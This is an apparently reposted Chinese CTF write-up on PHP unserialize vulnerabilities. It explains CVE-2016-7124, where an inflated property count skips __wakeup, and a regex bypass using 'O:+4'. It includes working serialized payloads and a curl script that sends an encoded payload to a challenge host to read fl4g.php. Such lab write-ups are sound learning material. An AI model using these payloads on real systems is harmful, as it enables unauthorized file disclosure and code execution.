• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

PHP反序列化利用(更新中)

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

根据题总结

源自一道ctf题

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

 

对序列化反序列化进行了理解。

 

serialize()是序列化函数,它可以保存一个的所有 变量 ,但是不会保存对象的方法,只会保存类的名字。

<?php
class A{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
class B{
    public $flag = '111';
}
$a = new A();
$b = new B();
$a = serialize($a);
$b = serialize($b);

echo($a);
echo($b);

 
?>

结果如下

O:1:"A":1:{s:4:"flag";s:3:"111";}

O:1:"B":1:{s:4:"flag";s:3:"111";}

没有什么区别

 

反序列化漏洞

unserialize()函数可把序列化数字符串变成php原来的值

所以字符串的参数可控,导致漏洞产生

比如将flag赋值<?php phpinfo;?>

<?php

$A = 'O:1:"A":1:{s:4:"flag";s:3:"111";}';

$B = 'O:1:"B":1:{s:4:"flag";s:3:"<?php phpinfo();?>";}';
#使用在线编译器编译报错,有过滤,本地未尝试。
print_r(unserialize($A)); print_r(unserialize($B)); ?>

 

同时还有可能SQL注入利用..由于是新手暂未接触,遇见会回来补充。

回到CTF,CVE-2016-7124,当序列化字符串中的表示对象属性个数值大于真实值时会跳过__wakeup的过滤。

 

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
$a = serialize($a);

echo($a);
#:4:"xctf":1:{s:4:"flag";s:3:"111";}
$test1 = unserialize($a);
echo($test1);
//////////////漏洞利用...///////////////////
$b='O:4:"xctf":4{s:4:"flag";s:3:"111";}';
////////////////////////////////////////////

http://111.198.29.45:42223/?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}
?>

 

 补充上次做的: 绕过正则+wakeup_

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

因为提示flag在Demo里面,所以首先对Demo进行序列化,处理结果后传参回去给var,进行反序列化。

<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}

$var = new Demo("fl4g.php");
$var = serialize($var);
//对序列号结果进行处理
$var = str_replace(':1:', ':3:',$var);//绕过wakeup
$var= str_replace('O:4', 'O:+4',$var);//绕过正则
echo $var;
echo base64_encode($var);

$curl = curl_init();
//curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,'http://111.198.29.45:37473/?'.'var='.$var);
$result = curl_exec($curl);
var_dump($result);?
curl_close($curl);
?>

 

 

 

 

 

 

php在线编译:http://code.php.net.cn/b37q111a

参考:https://xz.aliyun.com/t/378

 


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
PHP浮点数精度问题发布时间:2022-07-10
下一篇:
利用PHP实现页面跳转同时POST传参,CURL不行发布时间:2022-07-10
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap